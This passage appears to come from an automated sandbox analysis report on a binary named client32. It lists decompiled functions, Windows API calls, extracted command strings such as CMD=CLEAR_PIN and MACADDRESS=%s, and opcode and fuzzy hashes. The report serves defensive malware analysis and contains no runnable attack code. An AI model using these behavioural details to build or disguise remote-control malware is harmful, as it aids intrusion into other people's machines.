                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Window$Find$Sleep
                                                                                                • String ID: PCIVideoSlave32
                                                                                                • API String ID: 2137649973-2496367574
                                                                                                • Opcode ID: f9403fe9dea3d152aead7fa3d2adf20292fef7f356e696344d66dd2b7210a141
                                                                                                • Instruction ID: 349d86511175fe1d1df632f2bffc72f1f56a45a46628263fa2557b0125cca1c8
                                                                                                • Opcode Fuzzy Hash: f9403fe9dea3d152aead7fa3d2adf20292fef7f356e696344d66dd2b7210a141
                                                                                                • Instruction Fuzzy Hash: 44F0A473A4122A6EDB01EFF98DC4FA6B7D8AB84699F410074E968D7109F634E8014777
                                                                                                Function 11003400 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 41windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • LoadMenuA.USER32 ref: 1100340E
                                                                                                • GetSubMenu.USER32(00000000,00000000), ref: 1100343A
                                                                                                • GetSubMenu.USER32(00000000,00000000), ref: 1100345C
                                                                                                • DestroyMenu.USER32 ref: 1100346A
                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Menu$DestroyErrorExitLastLoadMessageProcesswsprintf
                                                                                                • String ID: ..\CTL32\annotate.cpp$hMenu$hSub
                                                                                                • API String ID: 468487828-934300333
                                                                                                • Opcode ID: cb09c6b33aa2397f6040dc9ac8fe113c92c7d1ba2ee6536d01521099fc9f1030
                                                                                                • Instruction ID: 1378fb0f7ab2c0978cd4d50cac7dc25882af45c4d25f08e40c7e232078aa5069
                                                                                                • Opcode Fuzzy Hash: cb09c6b33aa2397f6040dc9ac8fe113c92c7d1ba2ee6536d01521099fc9f1030
                                                                                                • Instruction Fuzzy Hash: B3F0E93AE9063573E25252A71C86F9FE2488B45699F500032F926BA580EA14B80043E9
                                                                                                Function 11003310 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 37windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • LoadMenuA.USER32 ref: 1100331D
                                                                                                • GetSubMenu.USER32(00000000,00000000), ref: 11003343
                                                                                                • GetMenuItemCount.USER32(00000000), ref: 11003367
                                                                                                • DestroyMenu.USER32 ref: 11003379
                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Menu$CountDestroyErrorExitItemLastLoadMessageProcesswsprintf
                                                                                                • String ID: ..\CTL32\annotate.cpp$hMenu$hSub
                                                                                                • API String ID: 4241058051-934300333
                                                                                                • Opcode ID: 85d4a40678ea7b6d13a0383658e2681328b2af046e894752399e51aa99d6900d
                                                                                                • Instruction ID: a78e3c2f88e64c1b086a81e8c9a2b46f663d882bee818e15e56a3ec0b04889ae
                                                                                                • Opcode Fuzzy Hash: 85d4a40678ea7b6d13a0383658e2681328b2af046e894752399e51aa99d6900d
                                                                                                • Instruction Fuzzy Hash: AEF02E36E9093A73D25212B72C4AFCFF6584F456ADB500031F922B5645EE14A40053A9
                                                                                                Function 1101B530 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 204libraryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 110DEB60: EnterCriticalSection.KERNEL32(111EE0A4,11018BE8,986DAFD2,?,?,?,111CD988,11187878,000000FF,?,1101ABB2), ref: 110DEB61
                                                                                                  • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                                  • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                                  • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                                • std::exception::exception.LIBCMT ref: 1101B776
                                                                                                • __CxxThrowException@8.LIBCMT ref: 1101B791
                                                                                                • LoadLibraryA.KERNEL32(NSSecurity.dll), ref: 1101B7AE
                                                                                                  • Part of subcall function 11008DD0: std::_Xinvalid_argument.LIBCPMT ref: 11008DEA
                                                                                                Strings
                                                                                                • NsAppSystem Info : Control Channel Command Sent : %d, xrefs: 1101B70A
                                                                                                • NSSecurity.dll, xrefs: 1101B7A3
                                                                                                • NsAppSystem Info : Control Channel Sending Command : %d, xrefs: 1101B6E9
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CriticalEnterException@8LibraryLoadSectionThrowXinvalid_argument_malloc_memsetstd::_std::exception::exceptionwsprintf
                                                                                                • String ID: NSSecurity.dll$NsAppSystem Info : Control Channel Command Sent : %d$NsAppSystem Info : Control Channel Sending Command : %d
                                                                                                • API String ID: 3515807602-1044166025
                                                                                                • Opcode ID: dde21e9f02bc989f84a52648ab5cfdb9b440b3ebe83e5bdf3d238e24019c4138
                                                                                                • Instruction ID: 97a0dec6d0d64d3c3877ebf05293913b11e378911f3366e288316342895a3808
                                                                                                • Opcode Fuzzy Hash: dde21e9f02bc989f84a52648ab5cfdb9b440b3ebe83e5bdf3d238e24019c4138
                                                                                                • Instruction Fuzzy Hash: 72718FB5D00309DFEB10CFA4C844BDDFBB4AF19318F244569E915AB381DB79AA44CB91
                                                                                                Function 69CE70F0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 124COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _memset$_free_memmove
                                                                                                • String ID: MSG$SENDER
                                                                                                • API String ID: 3114187808-3313591108
                                                                                                • Opcode ID: 7f150f465b34c7632555f311eb989a2781aec12040b5c8738d67f3989f458081
                                                                                                • Instruction ID: 2a3e589030a9e9239c36a6d1f174e94225653728f3bc804fafeca8108d8eac49
                                                                                                • Opcode Fuzzy Hash: 7f150f465b34c7632555f311eb989a2781aec12040b5c8738d67f3989f458081
                                                                                                • Instruction Fuzzy Hash: 25415CB5C002189AEB60DF649C41BAAB7F8BF05304F54D1A9E54DA7281EF309A95CFA1
                                                                                                Function 69CF5C90 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 104COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • _memset.LIBCMT ref: 69CF5CBF
                                                                                                  • Part of subcall function 69CF33A0: wsprintfA.USER32 ref: 69CF34FD
                                                                                                  • Part of subcall function 69CF7D00: __vswprintf.LIBCMT ref: 69CF7D26
                                                                                                  • Part of subcall function 69CF7B60: _sprintf.LIBCMT ref: 69CF7B77
                                                                                                  • Part of subcall function 69CF77E0: _free.LIBCMT ref: 69CF77EF
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: __vswprintf_free_memset_sprintfwsprintf
                                                                                                • String ID: 445817$CLIENT_NAME=%s$CMD=CLEAR_PIN$PIN=%s$PINserver
                                                                                                • API String ID: 2968883096-1650465934
                                                                                                • Opcode ID: 52264b04ba106ff421d2d7061ae45f2f19859c0670c409dd82cb5445f684d235
                                                                                                • Instruction ID: 569ae84d2f743bc072d0f456c97f12d51a0912080a10cab826a16576a9f3d8ce
                                                                                                • Opcode Fuzzy Hash: 52264b04ba106ff421d2d7061ae45f2f19859c0670c409dd82cb5445f684d235
                                                                                                • Instruction Fuzzy Hash: 173176B5D10118AADB64DB749C41FEEB7B8EF44314F40C2E9E60DE3181EF305A498B60
                                                                                                Function 69CE6CC0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 96libraryloaderCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetProcAddress.KERNEL32(?,InternetQueryDataAvailable,00000000,000000C8,756F11C0,?,69CEB586,00000000,00000000,0000002C,?,?,00000000,0000002B,?,?), ref: 69CE6D0A
                                                                                                • GetProcAddress.KERNEL32(?,InternetReadFile,?,69CEB586,00000000,00000000,0000002C,?,?,00000000,0000002B,?,?), ref: 69CE6D72
                                                                                                • SetLastError.KERNEL32(00000078,?,69CEB586,00000000,00000000,0000002C,?,?,00000000,0000002B,?,?), ref: 69CE6DCC
                                                                                                • SetLastError.KERNEL32(00000078,00000000,000000C8,756F11C0,?,69CEB586,00000000,00000000,0000002C,?,?,00000000,0000002B,?,?), ref: 69CE6DD6
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressErrorLastProc
                                                                                                • String ID: InternetQueryDataAvailable$InternetReadFile
                                                                                                • API String ID: 199729137-1434219782
                                                                                                • Opcode ID: 2e5a5311fec5f65b2e2bc01860eddb16d58ec5c5b0ccddbc4edf442c10498c4d
                                                                                                • Instruction ID: d2ab90070579c4240f8d18fc6f11e27de53d9b71b6b31c1a895d9e05b0a2fe1c
                                                                                                • Opcode Fuzzy Hash: 2e5a5311fec5f65b2e2bc01860eddb16d58ec5c5b0ccddbc4edf442c10498c4d
                                                                                                • Instruction Fuzzy Hash: 0B319E75E001999FEB20DF58DA90BD9B3B4FB49345F5085B9EA8AD7200E6705EC4CF50
                                                                                                Function 69CEB8E0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 86COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • _strtok.LIBCMT ref: 69CEB941
                                                                                                • _free.LIBCMT ref: 69CEB952
                                                                                                • _malloc.LIBCMT ref: 69CEB970
                                                                                                • _free.LIBCMT ref: 69CEB999
                                                                                                • _strtok.LIBCMT ref: 69CEB9A5
                                                                                                  • Part of subcall function 69CF7F80: _memset.LIBCMT ref: 69CF7F9F
                                                                                                  • Part of subcall function 69CF7F80: LoadLibraryA.KERNEL32(iphlpapi.dll), ref: 69CF7FAC
                                                                                                  • Part of subcall function 69CF7F80: GetProcAddress.KERNEL32(00000000,GetAdaptersInfo,?,?,00000000,?,?,?,?,?,?,?,?,69CEB916,?,00000100), ref: 69CF7FCB
                                                                                                  • Part of subcall function 69CF7F80: _malloc.LIBCMT ref: 69CF7FFB
                                                                                                  • Part of subcall function 69CF7F80: wsprintfA.USER32 ref: 69CF807C
                                                                                                  • Part of subcall function 69CF7F80: _free.LIBCMT ref: 69CF8110
                                                                                                  • Part of subcall function 69CF7F80: FreeLibrary.KERNEL32(00000000,?,00000000,?), ref: 69CF811C
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$Library_malloc_strtok$AddressFreeLoadProc_memsetwsprintf
                                                                                                • String ID: MACADDRESS=%s
                                                                                                • API String ID: 905297018-795797190
                                                                                                • Opcode ID: a8c04a3a96f872681c74677a670621f3d06622722c44bc43c6b17d21f975689e
                                                                                                • Instruction ID: c9088566a257f981fb9620b1972a75ce45961c6188771b47e4371d829d28f1c8
                                                                                                • Opcode Fuzzy Hash: a8c04a3a96f872681c74677a670621f3d06622722c44bc43c6b17d21f975689e
                                                                                                • Instruction Fuzzy Hash: 3C21C07AD0031537D711DB756D52FFA72B88F42B1CF0081A8EE459B280FBB6D90582E0
                                                                                                Function 69CEBC60 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 85COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 69CE5060: _free.LIBCMT ref: 69CE506A
                                                                                                  • Part of subcall function 69CE5060: _malloc.LIBCMT ref: 69CE5090
                                                                                                  • Part of subcall function 69CF7D00: __vswprintf.LIBCMT ref: 69CF7D26
                                                                                                • _free.LIBCMT ref: 69CEBCBA
                                                                                                  • Part of subcall function 69D01BFD: HeapFree.KERNEL32(00000000,00000000), ref: 69D01C13
                                                                                                  • Part of subcall function 69D01BFD: GetLastError.KERNEL32(00000000), ref: 69D01C25
                                                                                                • _free.LIBCMT ref: 69CEBCEC
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$ErrorFreeHeapLast__vswprintf_malloc
                                                                                                • String ID: APPTYPE=%d$CMD=USERSTATUS$DEPT=%s$USER=%s
                                                                                                • API String ID: 3180605519-731630419
                                                                                                • Opcode ID: 200ce748d866dba66baf3eeda6dc67e946dad880807f647e49a9b28a30409abe
                                                                                                • Instruction ID: 0c2f7fc6ce167d1c7d2251b6ce57570f56e9e9ceb6419ed450b7269724aa3f8f
                                                                                                • Opcode Fuzzy Hash: 200ce748d866dba66baf3eeda6dc67e946dad880807f647e49a9b28a30409abe
                                                                                                • Instruction Fuzzy Hash: 5E215EBA900208BBDB10DBA5EC51FFF777CAF45608F40D558AA06A7144FB35AA0587E1
                                                                                                Function 1103D0E0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80synchronizationwindowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 111100D0: SetEvent.KERNEL32(00000000,?,1102CB9F), ref: 111100F4
                                                                                                  • Part of subcall function 11110920: EnterCriticalSection.KERNEL32(00000010,00000000,756F110C,1100BF7B), ref: 11110928
                                                                                                  • Part of subcall function 11110920: LeaveCriticalSection.KERNEL32(00000010), ref: 11110935
                                                                                                • WaitForSingleObject.KERNEL32(?,00001388), ref: 1103D13A
                                                                                                • SetPriorityClass.KERNEL32(?,?), ref: 1103D167
                                                                                                • IsWindow.USER32(?), ref: 1103D17E
                                                                                                • SendMessageA.USER32(?,0000004A,000103BC,00000492), ref: 1103D1B8
                                                                                                • _free.LIBCMT ref: 1103D1BF
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$ClassEnterEventLeaveMessageObjectPrioritySendSingleWaitWindow_free
                                                                                                • String ID: Show16
                                                                                                • API String ID: 625148989-2844191965
                                                                                                • Opcode ID: 3c8172704bdceca68c72fbf0a9a51fac22612fd7412045f5de257e3282e9e7b5
                                                                                                • Instruction ID: 63bdf3f47677d5a3c66ccb25ed14d3d2c42581b640399fe0720dd9fbd5d3b219
                                                                                                • Opcode Fuzzy Hash: 3c8172704bdceca68c72fbf0a9a51fac22612fd7412045f5de257e3282e9e7b5
                                                                                                • Instruction Fuzzy Hash: 3B3182B5E10346AFD715DFA4C8849AFF7F9BB84309F40496DE56A97244DB70BA00CB81
                                                                                                Function 69CEAEA0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 79COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 69CF7D00: __vswprintf.LIBCMT ref: 69CF7D26
                                                                                                  • Part of subcall function 69CE5060: _free.LIBCMT ref: 69CE506A
                                                                                                  • Part of subcall function 69CE5060: _malloc.LIBCMT ref: 69CE5090
                                                                                                • _free.LIBCMT ref: 69CEAF0A
                                                                                                  • Part of subcall function 69D01BFD: HeapFree.KERNEL32(00000000,00000000), ref: 69D01C13
                                                                                                  • Part of subcall function 69D01BFD: GetLastError.KERNEL32(00000000), ref: 69D01C25
                                                                                                • _free.LIBCMT ref: 69CEAF39
                                                                                                  • Part of subcall function 69CF7B60: _sprintf.LIBCMT ref: 69CF7B77
                                                                                                  • Part of subcall function 69CF77E0: _free.LIBCMT ref: 69CF77EF
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$ErrorFreeHeapLast__vswprintf_malloc_sprintf
                                                                                                • String ID: CHANNEL=%s$CMD=STATUS$REQUESTING_HELP=%d$USERNAME=%s
                                                                                                • API String ID: 1628406020-2994292602
                                                                                                • Opcode ID: e2380831bbe77202f3779e8f13e6135b75c641bd738e3b431e387e7ad87d78fb
                                                                                                • Instruction ID: 3c4724d7bf94fb2157f5e98c6224093fac7214a65dd1e35d063457d2be3861f8
                                                                                                • Opcode Fuzzy Hash: e2380831bbe77202f3779e8f13e6135b75c641bd738e3b431e387e7ad87d78fb
                                                                                                • Instruction Fuzzy Hash: CE218BBA900108BACB11DBE4DC41FEF7B7C9F85608F509158AA02B7144FB31AA4697E4
                                                                                                Function 110ED020 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 63COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • IsWindow.USER32(0000070B), ref: 110ED02A
                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                • LoadCursorA.USER32(00000000,00007F00), ref: 110ED0B1
                                                                                                • SetCursor.USER32(00000000), ref: 110ED0B8
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
